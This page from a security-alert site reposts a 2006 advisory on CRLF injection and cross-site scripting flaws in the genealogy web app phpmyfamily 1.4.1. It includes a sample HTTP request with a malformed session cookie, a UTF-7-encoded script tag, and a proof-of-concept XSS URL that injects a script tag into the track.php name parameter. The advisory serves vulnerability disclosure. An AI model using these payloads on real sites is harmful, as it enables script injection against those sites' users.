SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

phpmyfamily 1.4.1 CRLF injection & XSS


Arrow  SecurityAlert : 636
Arrow  CVE : CVE-2006-1425
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : matrix_killer
Arrow  Published : 28.03.2006

Arrow  Affected Software : phpmyfamily v1.4.1



Arrow  Advisory Content :  

------------------------------------------------------
HYSA-2006-007 h4cky0u.org Advisory 016
------------------------------------------------------
Date - Mon March 27 2006

TITLE:
======

phpmyfamily v1.4.1 CRLF injection & XSS

SEVERITY:
=========

Medium

SOFTWARE:
=========

phpmyfamily v1.4.1

http://www.phpmyfamily.net/

INFO:
=====

phpmyfamily is a dynamic genealogy website builder which allows
geographically dispersed family members to maintain a central

database of research which is readily accessable and editable.

DESCRIPTION:
============

--== CRLF Injection ==--

GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close

Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z,

0-9 and '-,' in C:AppServwwwphpmyfamilyincconfig.inc.php on line 88

You can try to encode <script>alert('matrix_killer');</script> in Utf-7
like this:

+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer');
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-

This way you can bypass the protection, but I'm not sure that it will work.
For me it didn't but I'm still a beginner with

the crlf attacks.

--== XSS ==--

http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert
();</script>&email=1&action=sub&submit=Wy%B6lij

VENDOR STATUS:
==============

Vendor was contacted but no response received till date.

CREDITS:
========

This vulnerability was discovered and researched by matrix_killer of
h4cky0u Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org

Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us
!!!

ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.